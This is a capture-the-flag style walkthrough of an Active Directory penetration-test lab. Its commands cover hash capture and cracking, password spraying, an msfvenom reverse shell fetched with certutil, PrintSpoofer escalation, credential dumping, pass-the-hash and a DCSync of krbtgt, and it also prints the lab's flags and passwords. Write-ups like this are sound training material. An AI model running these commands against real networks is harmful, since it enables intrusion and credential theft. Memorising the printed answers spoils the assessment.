# AD Enumeration & Attacks - Skills Assessment Part II ### Scenario Our client Inlanefreight has contracted us again to perform a full-scope internal penetration test. The client is looking to find and remediate as many flaws as possible before going through a merger & acquisition process. The new CISO is particularly worried about more nuanced AD security flaws that may have gone unnoticed during previous penetration tests. The client is not concerned about stealth/evasive tactics and has also provided us with a Parrot Linux VM within the internal network to get the best possible coverage of all angles of the network and the Active Directory environment. Connect to the internal attack host via SSH (you can also connect to it using `xfreerdp` as shown in the beginning of this module) and begin looking for a foothold into the domain. Once you have a foothold, enumerate the domain and look for flaws that can be utilized to move laterally, escalate privileges, and achieve domain compromise. Q1) Obtain a password hash for a domain user account that can be leveraged to gain a foothold in the domain. What is the account name? Let's begin with starting responder with the default settings ```bash sudo responder -I ens224 ```

Let's review the Responder logs to determine if any hashes were captured. ```bash cat /usr/share/responder/logs/SMB-NTLMv2-SSP-172.16.7.3.txt ```

Answer: `AB920` Q2) What is this user's cleartext password? Let's save the hash to a file and attempt to crack it using Hashcat in order to retrieve the plaintext password. ```bash hashcat -m 5600 ab920_hash /usr/share/wordlists/rockyou.txt ```

Answer: `weasal` Q3) Submit the contents of the C:\flag.txt file on MS01. Let's check which hosts are alive in the domain first ```bash fping -asgq 172.16.7.0/23 ```

Let's save these IP addresses to a file and use Nmap to enumerate them, identifying which one corresponds to MS01. ```bash sudo nmap -v -A -iL hosts.txt ```

* **172.16.7.3:** `DC01` * **172.16.7.50:** `MS01` * **172.16.7.60:** `SQL01` * **172.16.7.240:** `Our Parrot machine` Let's verify whether the user **`ab920`** can log in to **`172.16.7.50`**, and determine which authentication protocol is supported for the connection. ```bash crackmapexec smb 172.16.7.50 -u 'ab920' -p 'weasal' crackmapexec winrm 172.16.7.50 -u 'ab920' -p 'weasal' ```

Let's use `Evil-WinRM` to authenticate with the **`ab920`** account. ```bash evil-winrm -i 172.16.7.50 -u 'ab920' -p 'weasal' ```

Answer: `aud1t_gr0up_m3mbersh1ps!` Q4) Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain. It is now time to create a list of target users to be used in the upcoming password spraying attack. ```bash sudo crackmapexec smb 172.16.7.3 -u 'ab920' -p 'weasal' --users | tee usernames.txt cat usernames.txt | cut -d'\' -f2 | awk -F " " '{print $1}' | tee valid_users.txt ```

We now have 2,904 valid usernames in the domain. Let's now proceed with the password spraying attack. ```bash kerbrute passwordspray -d inlanefreight.local --dc 172.16.7.3 valid_users.txt Welcome1 ```

Answer: `BR086` Q5) What is this user's password? Answer: `Welcome1` Q6) Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file? Let's perform share enumeration to identify any shared resources on which we may have read access. ```bash smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3 ```

I found a shared folder named **'Department Shares'** to which we have read access. Let's proceed to review its contents. ```bash smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3 -R 'Department Shares' ```

I found a file named **`web.config`** in the results. Let's review its contents to identify any relevant information. ```bash smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3 -R 'Department Shares' -A web.config ```

Answer: `D@ta_bAse_adm1n!` Q7) Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host. Next, we will use the obtained credentials to authenticate to SQL01 via mssqlclient. ```bash python3 /usr/local/bin/mssqlclient.py inlanefreight/netdb:'D@ta_bAse_adm1n!'@172.16.7.60 ```

We have successfully accessed SQL01; however, we do not have the necessary permissions to read the flag. Let's review our current permissions. ```sql EXEC xp_cmdshell 'whoami /priv' ```

We have the **SeImpersonatePrivilege** enabled, which can be leveraged for privilege escalation by exploiting the **PrintNightmare** vulnerability. Let's generate a payload using **msfvenom**, and also obtain **PrintSpoofer.exe**. We will download both files to the **SQL01** server. ```bash msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.7.240 LPORT=1335 -f exe -o shell.exe ```

Next, let's downlaod the two files onto the sql server ```bash xp_cmdshell "certutil.exe -urlcache -f http://172.16.7.240:8000/PrintSpoofer.exe C:\Users\Public\PrintSpoofer.exe" xp_cmdshell "certutil.exe -urlcache -f http://172.16.7.240:8000/shell.exe C:\Users\Public\shell.exe" ```

Let's initiate the Meterpreter listener and proceed with the privilege escalation attack. ```bash use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST 172.16.7.240 set LPORT 1335 ```

```sql xp_cmdshell C:\Users\Public\PrintSpoofer.exe -c C:\Users\Public\shell.exe ```

It is now time to retrieve the flag. ```bash more C:\Users\administrator\Desktop\flag.txt ```

Answer: `s3imp3rs0nate_cl@ssic` Q8) Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host. We now have system-level privileges on the SQL01 server; the next step is to attempt to retrieve the administrator's hash. ```bash load kiwi lsa_dump_creds ```

Next, we will use this hash to attempt a connection to the MS01 server. ```bash evil-winrm -i 172.16.7.50 -u administrator -H bdaffbfe64f1fc646a3353be1c2c3c99 ```

Answer: `exc3ss1ve_adm1n_r1ights!` Q9) Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name? Let's proceed to download **PowerView\.ps1** on **MS01** to enumerate Access Control Lists (ACLs). ```powershell certutil.exe -urlcache -f http://172.16.7.240:8000/PowerView.ps1 .\PowerView.ps1 Import-Module .\PowerView.ps1 Get-DomainObjectAcl -Identity "S-1-5-21-3327542485-274640656-2609762496-512" -ResolveGUID ```

I encountered an error while attempting this, so let's proceed using our Meterpreter session instead. ```bash use exploit/windows/smb/psexec set lhost 172.16.7.240 set rhosts 172.16.7.50 set smbuser administrator set smbpass 00000000000000000000000000000000:bdaffbfe64f1fc646a3353be1c2c3c99 exploit ``` ```powershell Get-DomainObjectAcl -Identity "S-1-5-21-3327542485-274640656-2609762496-512" -ResolveGUID ```

Let's apply a filter for the **GenericAll** permission. ```powershell Get-DomainObjectAcl -Identity "S-1-5-21-3327542485-274640656-2609762496-512" -ResolveGUID ```

Next, let'sconvert the security identifier (SID) to a username to identify the associated user. ```powershell Convert-SidtoName "S-1-5-21-3327542485-274640656-2609762496-4611" ```

Answer: `CT059` Q10) Crack this user's password hash and submit the cleartext password as your answer. For this task, we will use Inveigh on MS01 to conduct a man-in-the-middle attack in an attempt to capture the NTLM hash of the target user. ```powershell certutil.exe -urlcache -f http://172.16.7.240:8000/Inveigh.ps1 .\Inveigh.ps1 Import-Module .\Inveigh.ps1 Invoke-Inveigh -NBNS Y LLMNR Y -ConsoleOutput Y -FileOutput Y ```

Let's save this to a file and attempt to crack it using Hashcat. ```bash hashcat -m 5600 CT059_hash /usr/share/wordlists/rockyou.txt ```

Answer: `charlie1` Q11) Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host. The user **CT059** now has the **GenericAll** permission. Therefore, we can proceed to add this user to the **Domain Admins** group and initiate a **DCSync** attack. Let's configure the proxychains configuration file (`/etc/proxychains.conf`) on the Parrot host to route traffic through a SOCKS4 proxy on port 9050. This setup will allow us to authenticate to the MS01 machine via RDP using the credentials of the user **CT059**. ```bash sudo nano /etc/proxychains.conf ```

Next, establish an SSH connection and create a SOCKS proxy on local port 9050. ```bash ssh -D 9050 htb-student@10.129.221.33 ``` Let's now authenticate to the MS01 server via RDP using the credentials of user **`CT059`**. ```bash proxychains xfreerdp /v:172.16.7.50 /u:CT059 /p:charlie1 /d:inlanefreight.local /dynamic-resolution /drive:Shared,//home/htb-ac-1224655/ ```

Let's proceed to add this account to the Domain Admins group. ```bash net group 'Domain Admins' ct059 /add /domain ```

It is now time to migrate to DC01. ```powershell $cred = New-Object System.Management.Automation.PSCredential("INLANEFREIGHT\CT059", (ConvertTo-SecureString "charlie1" -AsPlainText -Force)) Enter-PSSession -ComputerName DC01 -Credential $cred ```

Answer: `acLs_f0r_th3_w1n!` Q12) Submit the NTLM hash for the KRBTGT account for the target domain after achieving domain compromise. Now, let's authenticate to DC01 and execute a DCSync attack. ```bash psexec.py inlanefreight.local/CT059:charlie1@172.16.7.3 lsadump::dcsync /user:inlanefreight\krbtgt ```

Answer: `7eba70412d81c1cd030d72a3e8dbe05f`